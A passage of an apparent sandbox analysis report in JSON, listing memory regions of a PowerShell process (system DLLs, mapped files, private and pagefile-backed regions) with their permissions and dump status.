"id": "region_1314", "name": "private_0x000007fffffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092887040, "timestamp": "00:01:07.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1405", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:08.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1406", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:08.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 356351, "entry_point": 0, "filename": null, "id": "region_1407", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:08.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_1408", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:08.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 471039, "entry_point": 458752, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_1409", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:01:08.008", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001410-addr_0x0000000000080000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_226", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 528383, "entry_point": 0, "filename": null, "id": "region_1410", "name": "private_0x0000000000080000", "norm_filename": null, "region_type": "private_memory", "start_va": 524288, "timestamp": "00:01:08.009", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001411-addr_0x0000000000110000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_227", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_1411", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:08.010", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001412-addr_0x0000000000150000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_228", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_1412", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:08.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2846719, "entry_point": 2424832, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1413", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2424832, "timestamp": "00:01:08.010", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001414-addr_0x00000000002c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_229", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_1414", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:01:08.010", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001415-addr_0x0000000000490000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_230", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 4849663, "entry_point": 0, "filename": null, "id": "region_1415", "name": "private_0x0000000000490000", "norm_filename": null, "region_type": "private_memory", "start_va": 4784128, "timestamp": "00:01:08.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 6455295, "entry_point": 0, "filename": null, "id": "region_1416", "name": "pagefile_0x00000000004a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4849664, "timestamp": "00:01:08.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6488064, "type": "region", "version": 1 }, "end_va": 8065023, "entry_point": 0, "filename": null, "id": "region_1417", "name": "pagefile_0x0000000000630000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6488064, "timestamp": "00:01:08.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8126464, "type": "region", "version": 1 }, "end_va": 29097983, "entry_point": 0, "filename": null, "id": "region_1418", "name": "pagefile_0x00000000007c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8126464, "timestamp": "00:01:08.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1419", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:08.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1420", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:08.012", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1421", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:08.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1422", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:08.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791555899392, "type": "region", "version": 1 }, "end_va": 8791556354047, "entry_point": 8791555903796, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_1423", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791555899392, "timestamp": "00:01:08.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791729963008, "type": "region", "version": 1 }, "end_va": 8791730065407, "entry_point": 8791729967528, "filename": "\\Windows\\System32\\atl.dll", "id": "region_1424", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 8791729963008, "timestamp": "00:01:08.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1425", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:08.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1426", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791759519744, "timestamp": "00:01:08.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1427", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:08.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1428", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:08.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1429", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:08.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1430", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:08.017", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1431", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:08.017", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1432", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:08.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1433", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791788683264, "timestamp": "00:01:08.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1434", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:08.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1435", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:08.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1436", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791791566848, "timestamp": "00:01:08.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1437", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:08.021", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001453-addr_0x00000000003f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_234", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_1453", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:01:08.126", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001454-addr_0x0000000001bc0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_235", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 29097984, "type": "region", "version": 1 }, "end_va": 30146559, "entry_point": 0, "filename": null, "id": "region_1454", "name": "private_0x0000000001bc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29097984, "timestamp": "00:01:08.126", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001455-addr_0x0000000001d00000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_236", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 30408704, "type": "region", "version": 1 }, "end_va": 30932991, "entry_point": 0, "filename": null, "id": "region_1455", "name": "private_0x0000000001d00000", "norm_filename": null, "region_type": "private_memory", "start_va": 30408704, "timestamp": "00:01:08.127", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1456", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754276864, "timestamp": "00:01:08.127", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_1475", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:01:08.207", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1249279, "entry_point": 0, "filename": null, "id": "region_1476", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:08.207", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 30932992, "type": "region", "version": 1 }, "end_va": 31846399, "entry_point": 0, "filename": null, "id": "region_1477", "name": "pagefile_0x0000000001d80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30932992, "timestamp": "00:01:08.207", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001478-addr_0x0000000001ed0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_243", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 32833535, "entry_point": 0, "filename": null, "id": "region_1478", "name": "private_0x0000000001ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32309248, "timestamp": "00:01:08.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791719804928, "type": "region", "version": 1 }, "end_va": 8791720157183, "entry_point": 8791719852992, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1479", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791719804928, "timestamp": "00:01:08.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1480", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:08.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791773216768, "type": "region", "version": 1 }, "end_va": 8791787405311, "entry_point": 8791773728444, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1481", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791773216768, "timestamp": "00:01:08.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 122880, "start_va": 8791742414848, "type": "region", "version": 1 }, "end_va": 8791742537727, "entry_point": 8791742419896, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_1482", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 8791742414848, "timestamp": "00:01:08.214", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791755390976, "type": "region", "version": 1 }, "end_va": 8791755452415, "entry_point": 8791755397552, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_1483", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791755390976, "timestamp": "00:01:08.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1318911, "entry_point": 0, "filename": null, "id": "region_1484", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:01:08.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791731339264, "type": "region", "version": 1 }, "end_va": 8791733387263, "entry_point": 8791732963620, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_1485", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791731339264, "timestamp": "00:01:08.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3936255, "entry_point": 0, "filename": null, "id": "region_1496", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:01:08.285", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4005887, "entry_point": 0, "filename": null, "id": "region_1497", "name": "pagefile_0x00000000003d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3997696, "timestamp": "00:01:08.285", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32833536, "type": "region", "version": 1 }, "end_va": 35778559, "entry_point": 32833536, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1498", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32833536, "timestamp": "00:01:08.285", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001499-addr_0x0000000002300000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_245", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 36700160, "type": "region", "version": 1 }, "end_va": 37224447, "entry_point": 0, "filename": null, "id": "region_1499", "name": "private_0x0000000002300000", "norm_filename": null, "region_type": "private_memory", "start_va": 36700160, "timestamp": "00:01:08.286", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 8791757881344, "type": "region", "version": 1 }, "end_va": 8791757987839, "entry_point": 8791757886808, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_1500", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 8791757881344, "timestamp": "00:01:08.286", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 221184, "start_va": 8791758471168, "type": "region", "version": 1 }, "end_va": 8791758692351, "entry_point": 8791758476404, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_1501", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 8791758471168, "timestamp": "00:01:08.287", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 8791759716352, "type": "region", "version": 1 }, "end_va": 8791761645567, "entry_point": 8791759720464, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_1502", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 8791759716352, "timestamp": "00:01:08.287", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001503-addr_0x000007fffffdb000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_246", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092870656, "type": "region", "version": 1 }, "end_va": 8796092878847, "entry_point": 0, "filename": null, "id": "region_1503", "name": "private_0x000007fffffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092870656, "timestamp": "00:01:08.288", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 